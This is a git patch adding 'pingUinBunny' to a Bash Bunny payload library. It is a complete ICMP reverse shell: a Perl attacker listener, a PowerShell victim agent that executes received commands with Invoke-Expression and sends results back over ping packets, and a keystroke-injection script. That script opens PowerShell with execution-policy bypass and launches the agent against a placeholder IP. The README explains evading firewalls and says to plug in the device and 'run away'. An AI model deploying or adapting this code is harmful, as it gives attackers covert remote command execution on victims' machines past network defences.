From 60f9b361f32943a508603583e5f128d4bc401ec7 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Sat, 11 Dec 2021 19:56:59 +0100 Subject: [PATCH] Uploaded pingUinBunny A reverse shell using icmp --- .../remote_access/pingUinBunny/Bunny.pl | 66 +++++++++++ .../pingUinBunny/Invoke-pingUin.ps1 | 105 ++++++++++++++++++ .../remote_access/pingUinBunny/README.md | 39 +++++++ .../remote_access/pingUinBunny/payload.txt | 43 +++++++ 4 files changed, 253 insertions(+) create mode 100644 payloads/library/remote_access/pingUinBunny/Bunny.pl create mode 100644 payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1 create mode 100644 payloads/library/remote_access/pingUinBunny/README.md create mode 100644 payloads/library/remote_access/pingUinBunny/payload.txt diff --git a/payloads/library/remote_access/pingUinBunny/Bunny.pl b/payloads/library/remote_access/pingUinBunny/Bunny.pl new file mode 100644 index 00000000..8807ebe9 --- /dev/null +++ b/payloads/library/remote_access/pingUinBunny/Bunny.pl @@ -0,0 +1,66 @@ +#!/usr/bin/env perl +# +# icmpsh - simple icmp command shell +# Copyright (c) 2010, Nico Leidecker +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# Modified by 0iphor13 for pingUinBunny +# +# +# +# + + +use strict; +use IO::Socket; +use NetPacket::IP; +use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO); +use Net::RawIP; +use Fcntl; + +print "Bunny waitin' for his friend...\n"; + +# create raw socket +my $sock = IO::Socket::INET->new( + Proto => "ICMP", + Type => SOCK_RAW, + Blocking => 1) or die "$!"; + +# set stdin to non-blocking +fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!"; + +print "Let's wait for PingUin!\n"; + +my $input = ''; +while(1) { + if ($sock->recv(my $buffer, 4096, 0)) { + my $ip = NetPacket::IP->decode($buffer); + my $icmp = NetPacket::ICMP->decode($ip->{data}); + if ($icmp->{type} == ICMP_ECHO) { + # get identifier and sequencenumber + my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data}); + + # write data to stdout and read from stdin + print $data; + $input = ; + + # compile and send response + $icmp->{type} = ICMP_ECHOREPLY; + $icmp->{data} = pack("SSa*", $ident, $seq, $input); + my $raw = $icmp->encode(); + my $addr = sockaddr_in(0, inet_aton($ip->{src_ip})); + $sock->send($raw, 0, $addr) or die "$!\n"; + } + } +} diff --git a/payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1 b/payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1 new file mode 100644 index 00000000..ab74e8ba --- /dev/null +++ b/payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1 @@ -0,0 +1,105 @@ +function Invoke-pingUin +{ +<# + +Original script by nishang - modified by 0iphor13 for pingUinBunny + +.PARAMETER IPAddress +The IP address of the server/listener to connect to. + +.PARAMETER Delay +Time in seconds for which the script waits for a command from the server. Default is 5 seconds. + +.PARAMETER BufferSize +The size of output Buffer. Defualt is 128. + +.EXAMPLE +# sysctl -w net.ipv4.icmp_echo_ignore_all=1 +# python icmpsh_m.py 192.168.254.226 192.168.254.1 + +Microsoft please don't block, oh dear microsoft corporation +#> + [CmdletBinding()] Param( + + [Parameter(Position = 0, Mandatory = $true)] + [String] + $IPAddress, + + [Parameter(Position = 1, Mandatory = $false)] + [Int] + $Delay = 5, + + [Parameter(Position = 2, Mandatory = $false)] + [Int] + $BufferSize = 128 + + ) + + #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response + $ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping + $PingOptions = New-Object System.Net.NetworkInformation.PingOptions + $PingOptions.DontFragment = $True + $MicrosoftCopyright =@" + + I'll pingUin! <3 + __ + -=(o '. + '.-.\ + /| \\ + '| || + by 0iphor13 _\_):,_ + + Windows PowerShell running as user $env:username on $env:computername `n +"@; + + # Copyright Copies Right + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright) + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + + #Show an interactive PowerShell prompt + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ') + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + + while ($true) + { + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('') + $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) + + #Check for Command from the server + if ($reply.Buffer) + { + $response = ([text.encoding]::ASCII).GetString($reply.Buffer) + $result = (Invoke-Expression -Command $response 2>&1 | Out-String ) + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result) + $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize) + $i = 0 + + #Fragmant larger output into smaller ones to send to the server. + if ($NeverGonnaGiveYouUp.length -gt $BufferSize) + { + while ($i -lt $index ) + { + $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)] + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null + $i +=1 + } + $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize + if ($remainingindex -ne 0) + { + $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)] + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null + } + } + else + { + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + } + $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ') + $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null + } + else + { + Start-Sleep -Seconds $Delay + } + } +} diff --git a/payloads/library/remote_access/pingUinBunny/README.md b/payloads/library/remote_access/pingUinBunny/README.md new file mode 100644 index 00000000..3185dafb --- /dev/null +++ b/payloads/library/remote_access/pingUinBunny/README.md @@ -0,0 +1,39 @@ +**Title: pingUinBunny** + +Author: 0iphor13 + +Version: 1.0 + +What is pingUinBunny? +# +*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).* +*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.* +*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.* +*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.* +*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.* +*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (Invoke-pingUin.ps1) and sends it commands to execute.* +# +There you go, a reverse shell. + +Instruction: + +Upload Bunny.pl onto your attacking machine. +Install dependencies, if needed: + IO::Socket, + NetPacket::IP, + NetPacket::ICMP + +Disable ICMP replies by the OS: + *sysctl -w net.ipv4.icmp_echo_ignore_all=1* + +Start Bunny.pl -> perl Bunny.pl +# +Plug in Bashbunny with pingUinBunny equipped. +Achieve reverse shell. +run away <3 + + +Credit for code and ideas: +bdamele +nishang +krabelize \ No newline at end of file diff --git a/payloads/library/remote_access/pingUinBunny/payload.txt b/payloads/library/remote_access/pingUinBunny/payload.txt new file mode 100644 index 00000000..10da7bbb --- /dev/null +++ b/payloads/library/remote_access/pingUinBunny/payload.txt @@ -0,0 +1,43 @@ +#!/bin/bash +# +# Title: pingUinBunny +# Description: Get remote access using a icmp reverse shell. +# Author: 0iphor13 +# Version: 1.0 +# Category: Remote_Access +# Attackmodes: HID, Storage + +LED SETUP + +DELAY 500 + +GET SWITCH_POSITION +DUCKY_LANG de + +DELAY 500 + +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 + +DELAY 5000 +RUN WIN "powershell -Exec Bypass" +DELAY 6000 +Q ENTER + +DELAY 10000 +Q STRING "Import-Module ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Invoke-pingUin.ps1')" +DELAY 10000 +Q ENTER +DELAY 10000 +Q STRING "Invoke-pingUin -IpAddress 0.0.0.0" +DELAY 10000 +Q ENTER + +DELAY 5000 + +ATTACKMODE HID + +LED FINISH